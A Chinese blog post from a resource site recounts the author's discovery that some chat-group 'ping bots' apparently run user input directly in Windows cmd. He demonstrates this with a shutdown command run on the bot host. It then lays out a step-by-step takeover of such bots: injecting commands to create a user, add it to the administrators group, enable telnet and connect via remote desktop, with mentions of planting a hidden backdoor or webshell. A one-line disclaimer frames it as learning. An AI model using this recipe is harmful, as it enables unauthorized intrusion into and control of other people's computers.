•   阿宇资源网欢迎您!
  •   欢迎访问阿宇资源网!

本站原创 ping机器人记一次偶然发现的漏洞

摘要: 很多群里都会有这样的ping机器人,就像这样先科普一下ping是什么东西就是一个网络诊断工具,判断网络是否通畅以及速度怎么样具体请自行百度:链接在此:ping-百度百科好,进入正题,因为一次偶然的机会...

很多群里都会有这样的ping机器人,就像这样

先科普一下ping是什么东西

就是一个网络诊断工具,判断网络是否通畅以及速度怎么样

具体请自行百度:链接在此:ping-百度百科

好,进入正题,因为一次偶然的机会

我听说,有些机器人的ping并非机器人来测速,是直接用cmd进行测速

于是做了以下测试

 

机器人反馈给我一个信息

这个ip可能是这个机器人的共享ip,

我们得到以下结果,说明命令成功的被执行

我所输入的shutdown -s -t 1

意思是一秒后电脑关机(Windows系统的cmd,也叫dos系统)

这就有了以下思路

1.利用一次上面的命令,ping到一个它自身的ip(如果运气好,是它本身)

2.利用命令创建一个用户

3.进行提权,升级用户为超级管理员权限

4.开启telnet权限,打开端口(如果对方为IIS,或许可以ftp传入小马,等等,思路很广阔)

5.执行本地的远程连接进行连接,就可以控制对方电脑了

这就成功的进行了渗透,后面的事情就自己解决了

例如开隐形后门,当然,不建议各位这么做,只是做一个学习和试验

下面是上面涉及的命令,均以Windows系统为准,思路去渗透linux系统也是可以的

1.

ping xxx.xxx.xxx.xxx(ip或者网址)

例如:ping www.aqyzit.cn

2.
net user 用户名 密码 /add
创建一个用户,名为:123密码为:456
net user 123 456 /add
当然也可以不设置密码,不设置密码只要不打上密码就可以了,如:
net user 123 /add
3.

然后就加入管理员组了:
net localgroup administrators 用户名 /add
还用上面的那个账号来做,如:net localgroup administrators 123 /add

4.

telnet IP地址 端口号

cmd下开启代码:sc config tlntsvr start= auto
net start telnet

具体情况请参照,不作详细介绍:cmd下开启telnet的方法

5.打开本地的cmd

mstsc,打开本地的远程登录

 

那么这次记录就到这里,可能途中有些注意事项并未提及,但是大概思路就是这样,希望各位有所学习,讲得不好或者不对请指出

本站原创文章,转载请联系,或留下联系方式

作者:不将就 联系QQ:2716301893

本文链接:http://www.ayuwl.cn/?id=158

版权声明:转载请带上版权原创为《阿宇资源网》
本站资源来自互联网侵权联系删除

分享到:

发表评论 取消回复

评论列表

还没有评论,快来说点什么吧~

(0%)

分享:

支付宝

微信